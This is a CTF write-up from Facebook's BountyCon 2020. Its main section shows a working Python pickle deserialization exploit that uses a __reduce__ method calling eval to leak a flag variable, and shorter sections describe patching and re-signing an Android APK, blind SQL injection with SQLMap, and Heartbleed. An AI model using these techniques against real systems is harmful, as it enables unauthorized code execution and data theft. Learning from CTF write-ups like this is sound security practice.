Facebook's BountyCon 2020 CTF Writeup

BugBounty, CTF, Facebook, Hacking, WebSecurity

BountyCon2020

BountyCon is an invitation-only application security conference arranged by Facebook annually in Singapore for the BugBounty Community of Asia-Pacific region.

For more information about it, check here.

BountyCon2020 is the second edition. I was lucky enough to win an all-sponsored invitation from Facebook to attend the last edition and it was just an amazing experience filled with lots of hacking, knowledge sharing, traveling around Singapore, networking and hacking discussions over food and drinks with fellow bug bounty hunters and talented hackers from all over the world. It can’t get better than that for a Hacker.

Shoutout to Hackers who made that trip a memorable one. Prateek Tiwari, Bhavuk Jain, Rahul Maini, Pranav Hivarekar, Anand Prakash and everyone else from Indian Bug Hunters Community.

To get an invite, one has to top the leaderboard of BountyCon CTF.

CTF Writeup

Following is a writeup for a challenge that I really liked solving and learned some new things in the process.

1. Tick-Tock

This was a white-box challenge around a python library. Code for an AWS lambda function was given which was vulnerable to arbitrary unpickling of Python Objects through pickle serialization library. 

1
2
3
4
5
6
class Epoch(object):
    def __init__(self, timestamp):
        self.ts = timestamp

epoch = Epoch('{:d}'.format(int(time.time())))
cookie = base64.b64encode(pickle.dumps(epoch))

The possible arbitrary code execution exploitation of pickle library was shut down by use of Lambda’s function shield which would block all the read, write, outbound connectivity and child process creation attempts. 

1
2
3
4
5
6
7
8
function_shield.configure({
    "policy": {
        "outbound_connectivity": "block",
        "read_write_tmp": "block",
        "create_child_process": "block",
        "read_handler": "block"
    }
})

The flag for the challenge was in a globally initialized variable.

Pseudo-Code of the execution was like the following:

1
2
3
4
5
6
7
8
If cookie is not set:
    - Initialize an Object of Epoch class with the timestamp.
    - Pickle this Object and set it as a cookie.
    - Send the response with an empty body.
Else:
    - Unpickle the cookie value.
    - Get the timestamp value from the cookie.
    - Send a page with HTML which shows timer using this timestamp variable.

So in a nutshell, whatever gets assigned to the timestamp variable of Epoch Class gets reflected into the HTML source. This was the trick to solve the challenge. We somehow had to trick the code into initializing the reflection with the flag variable and we had unpickling as a way to do it.

To arrive at the following solution, I scoured through the original documentation of pickle docs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
class Epoch(object):
    def __init__(self, timestamp):
        self.ts = timestamp
    def __reduce__(self):
        return (eval, (('Epoch(flag)'),))

def lambda_handler(event,con):
    epoch = Epoch("31337")
    cookie = base64.b64encode(pickle.dumps(epoch))
    
    return {
        'statusCode': 200,
        'Exploit-Cookie': cookie
    }

To manipulate it, we have the __reduce__ method which will govern the object creation upon successful unpickling. The above code returns a tuple with the first argument being the callable and second being the argument. The result of unpickling the pickled byte-stream of the above class’s instance will be eval('Epoch(flag)') getting executed and the result of eval getting directly returned.

In this case, it will be an instance of Epoch class getting initialized with flag variable and the variable containing flag string will get reflected into the HTML by the following code.

1
2
3
4
5
epoch = pickle.loads(base64.b64decode(
    event['multiValueHeaders']['cookie'][0]))
return {
   'body': clock_page(epoch.ts)
}

So with our exploit, it will indirectly mean,

1
epoch = Epoch(flag)

In this way, we successfully get the value of the flag variable in the ts class variable.

Following are the challenges that were not much exciting compared to tick-tock:

2. Lighthouse

Challenge had an android app. Upon reversing and analyzing the apk, It was clear that the app is taking flag string from native code, changing it to morse code string and using it to light the flash of the phone.
I had multiple ideas to solve it but I solved it by using a C++ tool which converts a video to morse code. I was not very sure that it was good enough to detect the morse code from the video stream of phone flash But I gave it a try anyway, The code is outdated and hence it was not getting compiled, made some tweaks to the C++ code so that it should compile. I recorded a video of phone flashing and fed it the compiled binary. It worked like a charm.

3. Shake it

This also was consisting of an android app. As its name suggests, It was counting down the 10 million shakes of the phone and upon completion of those many shakes, it would reveal the flag string stored in native code.
Decompiled the apk using apktool.

1
$ apktool d shake-it.apk

updated the smali code which was initializing this counter of 10 mils. to 10.

0xF4240 -> 0xA in the MainActivity.smali

1
2
3
4
5
6
 // In MainActivity.smali
.field private static final TARGET:I = 0xF4240

  			to

.field private static final TARGET:I = 0xA

Built the apk again.

1
$ apktool b shake-it -o shake-it-modified.apk

Self-signed it.

1
2
3
$ keytool -genkey -v -keystore key.keystore -alias self -keyalg RSA -keysize 2048 -validity 10000

$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore shake-it-modified.apk self

Installed the apk and shaken the phone ten times, got the flag!

4. Who’s Sequel

This challenge had a login form. Upon fuzzing it was clear that it was vulnerable to Blind SQLi. Dumping the table using SQLMap revealed the flag in the last row of one of the tables.

5. Heart of Stone

The Challenge name and Server header in response gave away the hint of HeartBleed (CVE-2014-0160), Exploited and read the memory containing the flag.

Due to work and other stuff, I don’t get much time to participate in CTFs for fun. But I recently formed a CTF team, UnderDawgs with Rudra and Arbaz and we are actively looking for people experienced in Pwn, Crypto and Reversing CTF challenges. If you think you can contribute to the team, Please reach out.

Thanks for reading.

Hack the Planet,
CaptainFreak